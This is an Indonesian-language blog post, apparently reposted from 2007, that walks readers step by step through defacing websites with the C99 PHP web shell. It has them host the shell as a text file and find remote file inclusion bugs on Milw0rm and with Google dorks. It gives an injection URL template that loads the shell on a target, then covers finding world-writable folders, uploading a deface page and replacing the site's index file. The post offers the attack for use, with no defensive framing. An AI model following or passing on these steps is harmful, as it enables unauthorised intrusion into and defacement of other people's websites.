Deface Step By Step With Php Shell (c99)
Kali ne gw mo bahas tentang cara Deface menggunakan Php Shell yaitu C99. Syarat wajib kalian musti punya script C99 yang dah terupload. Kalo lum pada punya, silahkan copy paste script DISINI.Simpan dalam format "txt". Silahkan upload di site kalian. Bisa cari yang gratis kek geocities or yang laen. Kalo maksa masih ga punya juga ya silahkan pake punya gw. Halah !! Paling pada make punya gw ne.. Dasar pada males !! Xixixixi….
OK..C99 nya dah siap. Sekarang kita cari bug (hole/lubang buat kita masuk ke server Target) nya. Gampang aja..Cari di Milw0rm. Cari yang "remote" yak… Kenapa ??? Coz mang kita mo masuk server target melalui remote (tidak melalui server target secara langsung). Cari yang "remote file inclusion" or "multiply remote file inclusion". Dah nemu kan ???? Masukkan dork nya di google or search engine kesayangan kalian. Terus ikuti langkah2 yang ada di bugnya. Biasanya sih suruh nambahin ja file inject (C99 dalam kasus ne) di belakang file yang vuln. Contoh "http://[site]/[path]/decoder/markdown.php?ccms_library_path=[File_C99]". Yang warna merah adalah Site target dan markdown.php?ccms_library_path= adalah file yang vuln beserta variablenya. Sedangkan [File_C99] adalah tempat dimana file C99 kita di upload. Jangan lupa tambahin "?" (tanda tanya, tanpa petik). Kenapa ?? Karena C99 tersebut sebenarnya adalah file PHP yang kita simpan sebagai file "txt".
Ok..gw kasih contoh ne…
Tuh kalo gw kek gitu..Kalian dah bisa lum ??? Ok kalo dah kita lanjot…Nah sekarang dah keliatan to isi servernya kek apa ? Silahkan jalan2 bentar di server orang..Xixixi…Dah jangan maen2 !! sekarang buruan cari folder yang full permission !!! Cirinya yang di samping kanan da tulisan ijo kek ginidwrxwrxwrx. Cari mpe ketemu…kalo ga da…Cari target yang laen ja. Coz di pastikan kalian ga bisa deface site tersebut. Key…kalo dah ketemu ayo lanjot ke step berikutnya !!! Klik Folder yang full permissionnya. Masuk kan…Nah kalian di folder tersebut bebas ngapain ja… Huzz jangan pada lompat2 gitu dunk !!! Senengnya minta ampun ik….Xixixixi….Nah..Langkah yang paling gampang buat deface adalah mengupload file Deface kalian ke server target. Di sebelah kanan bawah ada form "Upload". Nah…tinggal pilih file deface kalian trus Upload de…
Tunggu proses Upload mpe selese…Kalo dah, coba liat di list directorynya ada ga file kalian. Cuman mastiin kalo file kalian dah terupload dengan sukses. Ok…Sekarang liat dimana file deface kalian terupload. liat di active directory di bagian atas. Terus coba browse file file defacenya lewat browser. Misal active directorinya /home/portsaid/public_html/alfystudio/,berarti kalian musti browsing mengguanakan url www.alfystudio.com/file_deface_kalian.html. Dah kan..kaliatan ??? Xixixi..jadi Defacer deh kalian..Xixixi..Mantabb !!!! Ne kalo punya gw kek gini
Nah kira2 kek gitu de cara2 deface menggunakan Php Shell C99. Inget bro..kalo mo deface jangan merusak ya…. Kalo mo deface di main directory (www.target.com/), Jangan kalian hapus file index nya. Rename ja file Index nya dengan nama yang laen, terus rename file deface kalian dengan nama index.html. Key…Inget pesan Bapak !!!! Xixixixi….
OK de sekarang Time To Sleep… Bo2 dulu ya semua..Xixixi Ngantuk Berat ne.. Dah di tunggu cewe gw di mimpi…Xixixixi…Tungguin tulisan gw berikutnya yak tentang Bagaimana cara Mendapatkan password Admin di Site Target. Bubye !!!!!!!!!!!!!!
sumber : http://blackraptor.blogsome.com/2007/11/29/deface-step-by-step-with-php-shell-c99/
0 komentar: